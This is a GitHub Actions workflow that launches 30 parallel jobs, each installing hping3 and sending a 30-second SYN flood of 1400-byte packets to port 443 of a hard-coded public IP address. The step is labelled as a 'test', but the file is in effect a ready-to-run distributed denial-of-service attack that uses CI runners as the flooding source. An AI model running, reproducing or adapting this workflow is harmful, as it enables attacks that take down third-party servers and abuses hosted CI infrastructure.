name: 并发

on:
  push:
  workflow_dispatch:

concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true

env:
  TZ: Asia/Shanghai

jobs:
  concurrent-jobs:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        job_id: [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30]
    steps:
      - name: 测试
        run: |
          sudo apt install hping3 -q
          sudo timeout 30s hping3 -S --flood -V -d 1400 -p 443 -s 1000-65535 47.243.69.11 || true
